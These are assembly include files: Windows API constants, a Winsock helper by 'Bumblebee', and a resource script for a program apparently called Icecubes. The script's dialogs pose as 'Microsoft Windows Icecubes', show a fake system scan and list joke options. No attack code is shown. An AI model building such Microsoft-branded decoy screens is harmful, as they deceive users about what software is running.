(WM_USER+6) +CB_GETCURSEL = (WM_USER+7) +CB_GETLBTEXT = (WM_USER+8) +CB_GETLBTEXTLEN = (WM_USER+9) +CB_INSERTSTRING = (WM_USER+10) +CB_RESETCONTENT = (WM_USER+11) +CB_FINDSTRING = (WM_USER+12) +CB_SELECTSTRING = (WM_USER+13) +CB_SETCURSEL = (WM_USER+14) +CB_SHOWDROPDOWN = (WM_USER+15) +CB_GETITEMDATA = (WM_USER+16) +CB_SETITEMDATA = (WM_USER+17) +IFNDEF NOWIN31 +CB_GETDROPPEDCONTROLRECT = (WM_USER+18) +CB_SETITEMHEIGHT = (WM_USER+19) +CB_GETITEMHEIGHT = (WM_USER+20) +CB_SETEXTENDEDUI = (WM_USER+21) +CB_GETEXTENDEDUI = (WM_USER+22) +CB_GETDROPPEDSTATE = (WM_USER+23) +CB_FINDSTRINGEXACT = (WM_USER+24) +ENDIF + +ENDIF ; NOWINMESSAGES + +; Static Control styles (low word) +SS_LEFT = 00h +SS_CENTER = 01h +SS_RIGHT = 02h +SS_ICON = 03h +SS_BLACKRECT = 04h +SS_GRAYRECT = 05h +SS_WHITERECT = 06h +SS_BLACKFRAME = 07h +SS_GRAYFRAME = 08h +SS_WHITEFRAME = 09h +SS_SIMPLE = 0Bh +SS_LEFTNOWORDWRAP = 0Ch +SS_NOPREFIX = 80h ; Don't do "&" character translation + +IFNDEF NOWIN31 +IFNDEF NOWINMESSAGES + +;Static Control Messages +STM_SETICON = (WM_USER+0) +STM_GETICON = (WM_USER+1) +ENDIF +ENDIF + +; Scroll Bar Styles (low word) +SBS_HORZ = 0000h +SBS_VERT = 0001h +SBS_TOPALIGN = 0002h +SBS_LEFTALIGN = 0002h +SBS_BOTTOMALIGN = 0004h +SBS_RIGHTALIGN = 0004h +SBS_SIZEBOXTOPLEFTALIGN = 0002h +SBS_SIZEBOXBOTTOMRIGHTALIGN = 0004h +SBS_SIZEBOX = 0008h + +IFNDEF NOSYSMETRICS + +; GetSystemMetrics() codes +SM_CXSCREEN = 0 +SM_CYSCREEN = 1 +SM_CXVSCROLL = 2 +SM_CYHSCROLL = 3 +SM_CYCAPTION = 4 +SM_CXBORDER = 5 +SM_CYBORDER = 6 +SM_CXDLGFRAME = 7 +SM_CYDLGFRAME = 8 +SM_CYVTHUMB = 9 +SM_CXHTHUMB = 10 +SM_CXICON = 11 +SM_CYICON = 12 +SM_CXCURSOR = 13 +SM_CYCURSOR = 14 +SM_CYMENU = 15 +SM_CXFULLSCREEN = 16 +SM_CYFULLSCREEN = 17 +SM_CYKANJIWINDOW = 18 +SM_MOUSEPRESENT = 19 +SM_CYVSCROLL = 20 +SM_CXHSCROLL = 21 +SM_DEBUG = 22 +SM_SWAPBUTTON = 23 +SM_RESERVED1 = 24 +SM_RESERVED2 = 25 +SM_RESERVED3 = 26 +SM_RESERVED4 = 27 +SM_CXMIN = 28 +SM_CYMIN = 29 +SM_CXSIZE = 30 +SM_CYSIZE = 31 +SM_CXFRAME = 32 +SM_CYFRAME = 33 +SM_CXMINTRACK = 34 +SM_CYMINTRACK = 35 +IFNDEF NOWIN31 +SM_CXDOUBLECLK = 36 +SM_CYDOUBLECLK = 37 +SM_CXICONSPACING = 38 +SM_CYICONSPACING = 39 +SM_MENUDROPALIGNMENT = 40 +SM_PENWINDOWS = 41 +SM_DBCSENABLED = 42 +ENDIF +SM_CMETRICSMAX = 43 + +ENDIF ;NOSYSMETRICS + +IFNDEF NOCOLOR + +COLOR_SCROLLBAR = 0 +COLOR_BACKGROUND = 1 +COLOR_ACTIVECAPTION = 2 +COLOR_INACTIVECAPTION = 3 +COLOR_MENU = 4 +COLOR_WINDOW = 5 +COLOR_WINDOWFRAME = 6 +COLOR_MENUTEXT = 7 +COLOR_WINDOWTEXT = 8 +COLOR_CAPTIONTEXT = 9 +COLOR_ACTIVEBORDER = 10 +COLOR_INACTIVEBORDER = 11 +COLOR_APPWORKSPACE = 12 +COLOR_HIGHLIGHT = 13 +COLOR_HIGHLIGHTTEXT = 14 +COLOR_BTNFACE = 15 +COLOR_BTNSHADOW = 16 +COLOR_GRAYTEXT = 17 +COLOR_BTNTEXT = 18 +IFNDEF NOWIN31 +COLOR_INACTIVECAPTIONTEXT = 19 +COLOR_BTNHILIGHT = 20 +ENDIF +ENDIF ;NOCOLOR + +; Commands to pass WinHelp() +HELP_CONTEXT =0001h ;/* Display topic in ulTopic */ +HELP_QUIT =0002h ;/* Terminate help */ +HELP_INDEX =0003h ;/* Display index */ +HELP_HELPONHELP =0004h ;/* Display help on using help */ +HELP_SETINDEX =0005h ;/* Set the current Index for multi index help */ +HELP_KEY =0101h ;/* Display topic for keyword in offabData */ + +IFNDEF NOCOMM + +NOPARITY = 0 +ODDPARITY = 1 +EVENPARITY = 2 +MARKPARITY = 3 +SPACEPARITY = 4 + +ONESTOPBIT = 0 +ONE5STOPBITS = 1 +TWOSTOPBITS = 2 + +IGNORE = 0 ; /* Ignore signal */ +INFINITE = 0FFFFh ; /* Infinite timeout */ + +; Error Flags +CE_RXOVER = 0001h ; /* Receive Queue overflow */ +CE_OVERRUN = 0002h ; /* Receive Overrun Error */ +CE_RXPARITY = 0004h ; /* Receive Parity Error */ +CE_FRAME = 0008h ; /* Receive Framing error */ +CE_BREAK = 0010h ; /* Break Detected */ +CE_CTSTO = 0020h ; /* CTS Timeout */ +CE_DSRTO = 0040h ; /* DSR Timeout */ +CE_RLSDTO = 0080h ; /* RLSD Timeout */ +CE_TXFULL = 0100h ; /* TX Queue is full */ +CE_PTO = 0200h ; /* LPTx Timeout */ +CE_IOE = 0400h ; /* LPTx I/O Error */ +CE_DNS = 0800h ; /* LPTx Device not selected */ +CE_OOP = 1000h ; /* LPTx Out-Of-Paper */ +CE_MODE = 8000h ; /* Requested mode unsupported */ + +IE_BADID = (-1) ; /* Invalid or unsupported id */ +IE_OPEN = (-2) ; /* Device Already Open */ +IE_NOPEN = (-3) ; /* Device Not Open */ +IE_MEMORY = (-4) ; /* Unable to allocate queues */ +IE_DEFAULT = (-5) ; /* Error in default parameters */ +IE_HARDWARE = (-10) ; /* Hardware Not Present */ +IE_BYTESIZE = (-11) ; /* Illegal Byte Size */ +IE_BAUDRATE = (-12) ; /* Unsupported BaudRate */ + +; Events +EV_RXCHAR = 0001h ; /* Any Character received */ +EV_RXFLAG = 0002h ; /* Received certain character */ +EV_TXEMPTY = 0004h ; /* Transmitt Queue Empty */ +EV_CTS = 0008h ; /* CTS changed state */ +EV_DSR = 0010h ; /* DSR changed state */ +EV_RLSD = 0020h ; /* RLSD changed state */ +EV_BREAK = 0040h ; /* BREAK received */ +EV_ERR = 0080h ; /* Line status error occurred */ +EV_RING = 0100h ; /* Ring signal detected */ +EV_PERR = 0200h ; /* Printer error occured */ +EV_CTSS = 0400h ; /* CTS state */ +EV_DSRS = 0800h ; /* DSR state */ +EV_RLSDS = 1000h ; /* RLSD state */ +EV_RingTe = 2000h ; /* Ring Trailing Edge Indicator */ + + +; Escape Functions +SETXOFF = 1 ; /* Simulate XOFF received */ +SETXON = 2 ; /* Simulate XON received */ +SETRTS = 3 ; /* Set RTS high */ +CLRRTS = 4 ; /* Set RTS low */ +SETDTR = 5 ; /* Set DTR high */ +CLRDTR = 6 ; /* Set DTR low */ +RESETDEV = 7 ; /* Reset device if possible */ + +LPTx = 80h ; /* Set if ID is for LPT device */ + +IFNDEF NOWIN31 +; new escape functions +GETMAXLPT equ 8 ; Max supported LPT id +GETMAXCOM equ 9 ; Max supported COM id +GETBASEIRQ equ 10 ; Get port base & irq for a port + +; Comm Baud Rate indices +CBR_110 equ 0FF10h +CBR_300 equ 0FF11h +CBR_600 equ 0FF12h +CBR_1200 equ 0FF13h +CBR_2400 equ 0FF14h +CBR_4800 equ 0FF15h +CBR_9600 equ 0FF16h +CBR_14400 equ 0FF17h +CBR_19200 equ 0FF18h +; 0FF19h (reserved) +; 0FF1Ah (reserved) +CBR_38400 equ 0FF1Bh +; 0FF1Ch (reserved) +; 0FF1Dh (reserved) +; 0FF1Eh (reserved) +CBR_56000 equ 0FF1Fh +; 0FF20h (reserved) +; 0FF21h (reserved) +; 0FF22h (reserved) +CBR_128000 equ 0FF23h +; 0FF24h (reserved) +; 0FF25h (reserved) +; 0FF26h (reserved) +CBR_256000 equ 0FF27h + +; notifications passed in low word of lParam on WM_COMMNOTIFY messages +CN_RECEIVE equ 1 ; bytes are available in the input queue +CN_TRANSMIT equ 2 ; fewer than wOutTrigger bytes still + ; remain in the output queue waiting + ; to be transmitted. +CN_EVENT equ 4 ; an enabled event has occurred + +ENDIF + + +DCB struc + DCB_Id db ? ; /* Internal Device ID */ + DCB_BaudRate dw ? ; /* Baudrate at which runing */ + DCB_ByteSize db ? ; /* Number of bits/byte, 4-8 */ + DCB_Parity db ? ; /* 0-4=None,Odd,Even,Mark,Space */ + DCB_StopBits db ? ; /* 0,1,2 = 1, 1.5, 2 */ + DCB_RlsTimeout dw ? ; /* Timeout for RLSD to be set */ + DCB_CtsTimeout dw ? ; /* Timeout for CTS to be set */ + DCB_DsrTimeout dw ? ; /* Timeout for DSR to be set */ + + DCB_BitMask1 db ? + + ; BYTE fBinary: 1; /* Binary Mode (skip EOF check */ + ; BYTE fRtsDisable:1; /* Don't assert RTS at init time */ + ; BYTE fParity: 1; /* Enable parity checking */ + ; BYTE fOutxCtsFlow:1; /* CTS handshaking on output */ + ; BYTE fOutxDsrFlow:1; /* DSR handshaking on output */ + ; BYTE fDummy: 2; /* Reserved */ + ; BYTE fDtrDisable:1; /* Don't assert DTR at init time */ + + DCB_BitMask2 db ? + + ; BYTE fOutX: 1; /* Enable output X-ON/X-OFF */ + ; BYTE fInX: 1; /* Enable input X-ON/X-OFF */ + ; BYTE fPeChar: 1; /* Enable Parity Err Replacement */ + ; BYTE fNull: 1; /* Enable Null stripping */ + ; BYTE fChEvt: 1; /* Enable Rx character event. */ + ; BYTE fDtrflow: 1; /* DTR handshake on input */ + ; BYTE fRtsflow: 1; /* RTS handshake on input */ + ; BYTE fDummy2: 1; + + DCB_XonChar db ? ; /* Tx and Rx X-ON character */ + DCB_XoffChar db ? ; /* Tx and Rx X-OFF character */ + DCB_XonLim dw ? ; /* Transmit X-ON threshold */ + DCB_XoffLim dw ? ; /* Transmit X-OFF threshold */ + DCB_PeChar db ? ; /* Parity error replacement char */ + DCB_EofChar db ? ; /* End of Input character */ + DCB_EvtChar db ? ; /* Recieved Event character */ + DCB_TxDelay dw ? ; /* Amount of time between chars */ +DCB ends + +COMSTAT struc + COMS_BitMask1 db ? + +; BYTE fCtsHold: 1; /* Transmit is on CTS hold */ +; BYTE fDsrHold: 1; /* Transmit is on DSR hold */ +; BYTE fRlsdHold: 1; /* Transmit is on RLSD hold */ +; BYTE fXoffHold: 1; /* Received handshake */ +; BYTE fXoffSent: 1; /* Issued handshake */ +; BYTE fEof: 1; /* End of file character found */ +; BYTE fTxim: 1; /* Character being transmitted */ + + + COMS_cbInQue dw ? ; /* count of characters in Rx Queue */ + COMS_cbOutQue dw ? ; /* count of characters in Tx Queue */ +COMSTAT ends + +ENDIF ;NOCOM + +; +; Installable Driver Support +; +; Driver Messages +DRV_LOAD = 0001h +DRV_ENABLE = 0002h +DRV_OPEN = 0003h +DRV_CLOSE = 0004h +DRV_DISABLE = 0005h +DRV_FREE = 0006h +DRV_CONFIGURE = 0007h +DRV_QUERYCONFIGURE = 0008h +DRV_INSTALL = 0009h +DRV_REMOVE = 000Ah +DRV_EXITSESSION = 000Bh +DRV_POWER = 000Fh +DRV_RESERVED = 0800h +DRV_USER = 4000h + +;LPARAM of DRV_CONFIGURE message and return values +DRVCONFIGINFO struc + DRVCNF_dwDCISize dw ? + DRVCNF_lpszDCISectionName dd ? + DRVCNF_lpszDCIAliasName dd ? +DRVCONFIGINFO ends + +DRVCNF_CANCEL = 0000h +DRVCNF_OK = 0001h +DRVCNF_RESTART = 0002h + + +IFNDEF NOKERNEL +; +; Common Kernel errors +; +ERR_GALLOC = 01030h ; GlobalAlloc Failed +ERR_GREALLOC = 01031h ; GlobalReAlloc Failed +ERR_GLOCK = 01032h ; GlobalLock Failed +ERR_LALLOC = 01033h ; LocalAlloc Failed +ERR_LREALLOC = 01034h ; LocalReAlloc Failed +ERR_LLOCK = 01035h ; LocalLock Failed +ERR_ALLOCRES = 01036h ; AllocResource Failed +ERR_LOCKRES = 01037h ; LockResource Failed +ERR_LOADMODULE = 01038h ; LoadModule failed + +; +; Common User Errors +; +ERR_CREATEDLG = 01045h ; /* Create Dlg failure due to LoadMenu failure */ +ERR_CREATEDLG2 = 01046h ; /* Create Dlg failure due to CreateWindow Failure */ +ERR_REGISTERCLASS = 01047h ; /* RegisterClass failure due to Class already registered */ +ERR_DCBUSY = 01048h ; /* DC Cache is full */ +ERR_CREATEWND = 01049h ; /* Create Wnd failed due to class not found */ +ERR_STRUCEXTRA = 01050h ; /* Unallocated Extra space is used */ +ERR_LOADSTR = 01051h ; /* LoadString() failed */ +ERR_LOADMENU = 01052h ; /* LoadMenu Failed */ +ERR_NESTEDBEGINPAINT = 01053h ; /* Nested BeginPaint() calls */ +ERR_BADINDEX = 01054h ; /* Bad index to Get/Set Class/Window Word/Long */ +ERR_CREATEMENU = 01055h ; /* Error creating menu */ + +; +; Common GDI Errors +; +ERR_CREATEDC = 01070h ; /* CreateDC/CreateIC etc., failure */ +ERR_CREATEMETA = 01071h ; /* CreateMetafile failure */ +ERR_DELOBJSELECTED = 01072h ; /* Bitmap being deleted is selected into DC */ +ERR_SELBITMAP = 01073h ; /* Bitmap being selected is already selected elsewhere */ + +ENDIF ;NOKERNEL +[WINDOWS.INC] +[WSOCKS.INC] +; +; WSocks.inc: include file for windows sockets . +; Designed for TASM5 and Win32. +; +; (C) 1999 Bumblebee. +; +; This file contains basic structures and stuff to work +; with windows sockets. +; + +; Descriptions of the API: +; arguments in order of PUSH ;) + +; only for debug +extrn WSAGetLastError:PROC + +; starts the use of winsock dll +; addr WSADATA, version requested +; returns: 0 ok +extrn WSAStartup:PROC + +; terminates the use of winsock dll +; returns: SOCK_ERR on error +extrn WSACleanup:PROC + +; opens a new socket +; protocol (PCL_NONE), type (SOCK_??), addr format (AF_??) +; returns: socket id or SOCKET_ERR (socket is dw) +extrn socket:PROC + +; closes a socket +; socket descriptor +; +extrn closesocket:PROC + +; sends data (this socks are a shit... Unix uses simple write) +; flags (1 OOB data or 0 normal ) , length, addr of buffer, socket +; returns: caracters sent or SOCKET_ERR on error +extrn send:PROC + +; reveives data (this socks are a shit... Unix uses simple read) +; flags (use 0), length, addr of buffer, socket +; returns: caracters sent or SOCKET_ERR on error +extrn recv:PROC + +; connects to a server +; sizeof struct SOCKADDR, struct SOCKADDR, socket +; returns: SOCKET_ERR on error +extrn connect:PROC + +; gets the name of the current host +; length of the buffer for name, addr of buffer for name +; return: SOCKET_ERR on error +extrn gethostname:PROC + +; gets strcut hostent +; addr of name +; returns: ponter to the struct or 0 on error +extrn gethostbyname:PROC + +; converts a zstring like "xxx.xxx.xx...." to netw byte order +; zstring ptr to change to dotted addr format +; returns: in_addr (dd) +extrn inet_addr:PROC + +; dw to convert into netw byte order (usually the port) +; returns: the value in network byte order (dw) +extrn htons:PROC + +; Structs :o + +; sockaddr struct for connection +; modified (for better use) +; if you want the original look for it into a winsock.h +SOCKADDR struct +sin_family dw 0 ; ex. AF_INET +sin_port dw 0 ; use htons for this +sin_addr dd 0 ; here goes server node (from inet_addr) +sin_zero db 8 dup(0) +SOCKADDR ends + +; for WSAStartup diagnose +WSADATA struct +mVersion dw 0 +mHighVersion dw 0 +szDescription db 257 dup(0) +szSystemStatus db 129 dup(0) +iMaxSockets dw 0 +iMaxUpdDg dw 0 +lpVendorInfo dd 0 +WSADATA ends + +; Some nice equs + +; what version of winsock do you need? (usually 1.1) +VERSION1_0 equ 0100h +VERSION1_1 equ 0101h +VERSION2_0 equ 0200h + +AF_UNIX equ 1 ; local host +AF_INET equ 2 ; internet (most used) +AF_IMPLINK equ 3 ; arpanet +AF_NETBIOS equ 17 ; NetBios style addresses + +; types of sockets +SOCK_STREAM equ 1 ; stream (connection oriented; telnet like) +SOCK_DGRAM equ 2 ; datagram (packets, packets, packets) + +; protocol +PCL_NONE equ 0 ; none (define the protocol not needed) + +SOCKET_ERR equ -1 ; standard winsock error + +HOSTENT_IP equ 10h ; where is the IP into the hostent struct +[WSOCKS.INC] +[ICECUBES.RC] +#define IDM_ABOUTBOX 0x0010 +#define IDD_ABOUTBOX 100 +#define IDS_ABOUTBOX 101 +#define IDD_VKS_DIALOG_0 102 +#define IDD_VKS_DIALOG_1 103 +#define IDR_MAINFRAME 128 +#define IDC_CHECK1 1000 +#define IDC_CHECK2 1001 +#define IDC_EDIT3 1003 +#define IDC_SPIN1 1018 +#define IDC_COMBO1 1004 +#define IDC_EDIT1 1005 +#define IDC_CHECK3 1006 +#define IDC_CHECK4 1007 +#define IDC_EDIT2 1008 +#define IDC_BUTTON1 1009 +#define IDC_BUTTON2 1014 +#define IDC_CHECK5 1010 +#define IDC_RADIO1 1012 +#define IDC_RADIO2 1013 +#define IDC_STATIC 1015 +#define IDC_STATIC2 1016 + + +11 ICON "icecubes.ico" + +IDD_VKS_DIALOG_0 DIALOG 0, 0, 255, 20 +STYLE DS_MODALFRAME | DS_3DLOOK | DS_CENTER | WS_POPUP | WS_VISIBLE | + WS_CAPTION | WS_SYSMENU +CAPTION "Scanning system for Microsoft Windows Icecubes..." +FONT 8, "Verdana" +BEGIN + CONTROL "",105,"msctls_progress32",WS_CLIPSIBLINGS,5,5,244,11 +END + + +IDD_VKS_DIALOG_1 DIALOG 0, 0, 233, 252 +STYLE DS_MODALFRAME | DS_3DLOOK | WS_POPUP | WS_VISIBLE | WS_CAPTION | WS_SYSMENU +EXSTYLE WS_EX_APPWINDOW +CAPTION "Microsoft Windows Icecubes" +FONT 8, "MS Sans Serif" +BEGIN + + LTEXT "Manufacturer's default settings (not to be edited)", + IDC_STATIC,13,8,200,8 + + GROUPBOX "Endurance options",IDC_STATIC,7,23,218,53 + CONTROL "Crash every",IDC_CHECK1,"Button",BS_AUTOCHECKBOX | + WS_TABSTOP,15,36,50,10 + CONTROL "Crash after",IDC_CHECK2,"Button",BS_AUTOCHECKBOX | + WS_TABSTOP,15,54,50,10 + + EDITTEXT IDC_EDIT3,75,35,34,12,ES_AUTOHSCROLL + CONTROL "Spin1",IDC_SPIN1,"msctls_updown32",UDS_ARROWKEYS,108,35, + 8,12 + + COMBOBOX IDC_COMBO1,130,35,72,85,CBS_DROPDOWNLIST | CBS_SORT | + WS_VSCROLL | WS_TABSTOP + + EDITTEXT IDC_EDIT1,75,53,43,13,ES_AUTOHSCROLL + LTEXT "bytes of un-saved changes",IDC_STATIC,130,55,94,13 + + + GROUPBOX "Save options",IDC_STATIC,7,81,218,69 + CONTROL "Create incredibly large files",IDC_CHECK3,"Button", + BS_AUTOCHECKBOX | WS_TABSTOP,15,94,163,10 + CONTROL "Allow me to carry on typing during AutoRecovery saves", + IDC_CHECK4,"Button",BS_AUTOCHECKBOX | WS_TABSTOP,15,112, + 195,10 + LTEXT "Fail AutoRecovery at",IDC_STATIC,25,130,120,13 + LTEXT "percent",IDC_STATIC2,125,130,50,13 + + EDITTEXT IDC_EDIT2,100,128,18,12,ES_AUTOHSCROLL + + GROUPBOX "Other options",IDC_STATIC,7,157,218,70 + CONTROL "Decrease boot speed by 70%",IDC_CHECK5,"Button", + BS_AUTOCHECKBOX | WS_TABSTOP,15,170,190,14 + CONTROL "constantly",IDC_RADIO1,"Button",BS_AUTORADIOBUTTON,35, + 198,48,10 + CONTROL "when I least expect it",IDC_RADIO2,"Button", + BS_AUTORADIOBUTTON,35,210,83,10 + LTEXT "Annoy me with that sodding paperclip",IDC_STATIC,25,186, + 136,10 + + PUSHBUTTON "Cancel",IDC_BUTTON1,122,233,50,12 + DEFPUSHBUTTON "Ok",IDC_BUTTON2,64,233,50,12 + +END + + +